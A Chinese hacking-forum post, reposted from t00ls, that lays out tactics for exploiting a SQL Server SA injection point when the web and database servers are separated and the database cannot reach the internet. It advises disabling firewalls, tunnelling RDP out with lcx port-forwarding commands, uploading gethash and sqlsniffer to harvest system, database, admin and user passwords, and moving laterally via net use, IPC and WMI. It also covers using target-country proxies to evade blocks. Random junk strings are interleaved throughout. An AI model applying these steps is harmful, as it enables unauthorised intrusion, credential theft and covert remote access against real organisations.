当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
4 l4 \' r9 r* ^, A \1 j, j) T% W# F
# T& Z; F8 W |; U% x {; a& Y% q; V" o3 ?
- c7 v: y& Z* Y" i/ h$ w: N3 P6 ^
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)+ m# z' Z6 ?" J' q0 Q( {9 o
: M/ H) b6 H. N
& f, b% k; S& [- e一、DB机有公网IP.
7 Z/ l8 o0 u; e, f5 T
R9 r8 x7 A; B. V1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
' e, n; v5 {. |; x; Z8 F* ^# \' t
3 q; b2 o- H9 D/ t2 N& s2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.! g! J3 D' {1 V7 K$ r, F$ M
" r" Y7 m- L& ^% B
3 W1 q: H' b( B: _" q8 j0 l/ }3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
' c) P' F; C0 d u/ @) \* y* {: i4 k0 H# H& ]
$ ~, D: y* ~& b p! @# `4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.( k0 V# F( k) o5 t! g$ {
; s1 }. c( O8 F
. D# ~) f. J8 T
7 P' E$ K9 v8 u, q1 N& z) ]0 D6 N二、DB机只有内网IP& x" j; }9 T- D: @6 x
C% l' ^0 c! _. f1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.4 _, C5 O# ~8 q+ _9 H
: r) i5 U0 ?6 W' K! e( A7 V
! V1 J1 o% {+ P. P, G, o' y/ \6 u2:停掉防火墙和IP策略再从内往外扫描.& r) R) v5 j! B; t
, b0 L% Z J- i: V. h" n: C+ y: _2 `% P4 Y P4 x
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
4 W- \: n, f9 L6 I5 I. J
\1 @- W' m, S5 v7 A$ ~; X3 p$ w! n3 s5 K2 M
4:学会密码规律分析往往会有惊喜.! m# N% k' Q. F: ^3 ]9 q( O/ V
8 \* m& R. |4 z$ q8 r4 n
0 i. G' I7 H8 {/ T* v5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等; O% k0 i: N3 l" B7 s0 ^3 T- h
: f3 F* d R" k
, L! b3 C; V5 H5 k9 r, V
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对